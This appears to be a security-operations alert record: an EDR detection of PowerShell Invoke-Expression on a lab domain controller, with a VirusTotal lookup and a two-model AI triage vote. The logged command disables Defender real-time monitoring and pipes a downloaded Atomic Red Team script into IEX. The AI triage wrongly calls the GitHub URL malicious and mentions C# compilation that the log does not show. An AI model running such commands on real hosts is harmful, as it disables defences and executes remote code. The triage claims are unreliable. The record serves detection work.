{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00023-WIN-PS_Invoke_Expression_Usage",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1115 -CheckPrereqs ; Invoke-AtomicTest T1115 -GetPrereqs ; Invoke-AtomicTest T1115 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 150003712,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld84DF.tmp.bat T1115 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4497408,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 644,
        "THIS_ATOM": "f6c3ef3bd7e0803778897af369c2a83c",
        "THREADS": 3,
        "TIMESTAMP": 1774364731328,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 644,
      "PROCESS_ID": 4708,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
      "event_time": 1774364731901,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3226,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "f6c3ef3bd7e0803778897af369c2a83c",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "abf4184fcffb7c87575b024b69c2a83e"
    }
  },
  "detect_id": "7a5d7a3a-a319-450c-a230-683569c2a83f",
  "detect_mtd": {
    "description": "Invoke-Expression is a Powershell commandlet that evaluates and executes a string as a command. Adversaries and frameworks such as Empire use this technique to pull encoded implants from websites as strings and execute them. This detector looks for the use of Invoke-Expression in the commandline of a Powershell process.",
    "falsepositives": [
      "Invoke-Expression used in combination with NuGet, Chef, Puppet, or other administrator like functions is all normal behavior."
    ],
    "references": [
      "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6",
      "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf",
      "https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf",
      "https://isc.sans.edu/diary/Malicious+Powershell+Script+Dissection/24282"
    ],
    "tags": [
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364735127,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364731\u0026selected=abf4184fcffb7c87575b024b69c2a83e",
  "namespace": "general",
  "priority": 2,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
    "event_time": 1774364731901,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3226,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "f6c3ef3bd7e0803778897af369c2a83c",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "abf4184fcffb7c87575b024b69c2a83e"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-PS_Invoke_Expression_Usage",
  "ts": 1774364735000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned after this event?",
    "Are there any scheduled tasks or registry keys modified?",
    "Has the host been connected to external networks since this event?",
    "What is the purpose of the compiled C# code in TEMP directory?"
  ],
  "ioc_analysis": "The command line explicitly contains IEX (Invoke-Expression) downloading from a known malicious source URL. The use of Set-MpPreference to disable real-time monitoring and execution policy changes indicates premeditated evasion. While the process path is legitimate (System32), the behavior is clearly malicious.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1115"
    }
  ],
  "mitre_techniques": [
    "T1059.001",
    "T1059.004",
    "T1059.003",
    "T1059.002",
    "T1059.001",
    "T1059.004",
    "T1059.003",
    "T1059.002"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block the GitHub URL at the network perimeter",
    "Review all PowerShell execution policies on the system",
    "Check for persistence mechanisms installed by Atomic Red Team",
    "Analyze memory dumps for C# compilation artifacts"
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a high-confidence malicious activity where PowerShell is executing an IEX command to download and execute code from a GitHub repository associated with the Atomic Red Team. The process tree shows compilation of C# code to bypass security controls, indicating active exploitation rather than benign maintenance.\n\n**IOC Analysis:** The command line explicitly contains IEX (Invoke-Expression) downloading from a known malicious source URL. The use of Set-MpPreference to disable real-time monitoring and execution policy changes indicates premeditated evasion. While the process path is legitimate (System32), the behavior is clearly malicious.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe PowerShell process from C:\\Windows\\System32 is running suspicious commands that modify system settings, disable real-time monitoring, and download external scripts, indicating potential malicious intent despite being a legitimate binary.\n\n**IOC Analysis:** The FILE_PATH is a known-good Windows system binary location, and the hash is Microsoft-signed, making the process itself benign. However, the command line includes actions like changing execution policy, disabling antivirus monitoring, and downloading scripts from GitHub, which are common indicators of malicious activity. The parent process is cmd.exe from the TEMP directory, often used in attack chains.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}